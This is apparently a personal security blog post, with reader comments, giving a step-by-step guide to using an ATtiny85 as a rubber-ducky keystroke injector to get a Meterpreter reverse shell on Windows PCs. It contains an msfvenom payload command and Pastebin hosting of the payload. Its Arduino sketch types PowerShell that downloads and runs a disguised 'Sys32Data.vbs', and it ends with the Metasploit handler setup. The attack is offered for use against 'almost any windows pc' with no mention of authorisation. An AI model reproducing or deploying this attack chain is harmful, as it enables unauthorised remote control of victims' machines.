How to get meterpreter shell with a Rubber ducky – attiny85

In the previous blog i have introduced what is a rubber ducky and how to use attiny85 as a rubber ducky. If you haven’t read that, you can check it out here. This is an arduino based chip with a low space available. We cant load a huge payload in to the flash memory. Here is a way to load the payload no matter how big it is. We have to make a payload using msfvenom and upload the code to pastebin. The ducky will load the script from the pastebin via the internet using powershell and execute it on the system. As soon as the script is executed, a meterpreter session will be pwned connect backs to the listener.

No more boring sessions, Just follow the steps.

 

Video Demo

 

step 1 : Create a payload

Use msfvenom to create a reverse_tcp payload. We should use VBS payload instead of EXE .

# msfvenom -p windows/meterpreter/reverse_tcp   -f vbs   –smallest  LHOST=“attacker ip”  LPORT=444 -o /root/Desktop/payload.txt

 

step 2: upload code to pastebin

Now open the file payload.txt from the desktop and copy the whole code. goto pastebin.com > click on “NEW PASTE” and paste the code, then click create paste. A new paste will be created. Note down the url somewhere, we need that in future.

 

step 3: Flashing Ducky

Attiny85 chip should be programmed to download raw code from pastebin and execute it. Use the script below. all you need to edit is the pastebin url  (line 20). Replace that “change_to_Your_url” . Make sure you are using “RAW” url. It should look something like this “https://pastebin.com/raw/abcd..” simply add “/raw/” in between.

after changing url compile and flash code using Arduino IDE to your chip. If you don,t know how to do that you must check my previous blog on 1$ rubber ducky preview .

 

#include "DigiKeyboard.h"

void setup() {
}

void loop() {
 int d=1000;
 // this is generally not necessary but with some older systems it seems to
 // prevent missing the first character after a delay:
 DigiKeyboard.sendKeyStroke(0);
 DigiKeyboard.delay(d);
 DigiKeyboard.sendKeyStroke(0,MOD_GUI_LEFT);
 DigiKeyboard.print("powershell");
 DigiKeyboard.delay(50);
 DigiKeyboard.sendKeyStroke(KEY_ENTER);
 DigiKeyboard.delay(d);
 DigiKeyboard.print("$client = new-object System.Net.WebClient");
 DigiKeyboard.sendKeyStroke(KEY_ENTER);
 DigiKeyboard.delay(d);
 DigiKeyboard.print("$client.DownloadFile('change_to_Your_url','Sys32Data.vbs')");
 DigiKeyboard.sendKeyStroke(KEY_ENTER);
 DigiKeyboard.print("start Sys32Data.vbs");
 DigiKeyboard.sendKeyStroke(KEY_ENTER);
 DigiKeyboard.delay(1000);
 DigiKeyboard.sendKeyStroke(KEY_F4|MOD_ALT_LEFT);
 DigiKeyboard.delay(50000);
}

step 4: setup handler

Setup reverse_tcp handler in msfconsole as we always do for metasploit based attacks.

# msfconsole

Wait for a minute, msfconsole will come up. Use handler then, set payload and port.

1. Handler

msf> use multi/handler

2. set payload

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

3. Set local port

msf exploit(handler) > set LPORT 444

4. Set local host

msf exploit(handler) > set LHOST “attacker ip”

5. exploit

msf exploit(handler) > exploit

Wait for the target to connect back

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.102:444
[*] Starting the payload handler…

 

step 5: Plug on target

Simplest of all, just plug in the attiny85 to the target system. with this method you hack almost any windows pc over LAN and WAN. Any doubts or questions? post it on the comment section below. If you like this blog give me a like on facebook and add me on google plus. Subscribe my youtube channel for video tutorials.

susmith HCK

susmith HCK

I’m a computer enthusiast basically and i love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and i would like to explore security vulnerabilities and latest tech news and wanna share with you. If you like all these stuffs add me on Facebook and Google plus.

You may also like...

3 Responses

  1. Amal says:

    You said LAN or WAN. Won’t we need port forward setup to do it on WAN?

  2. mr.robot says:

    Yes, you actually do…

Leave a Reply

Your email address will not be published. Required fields are marked *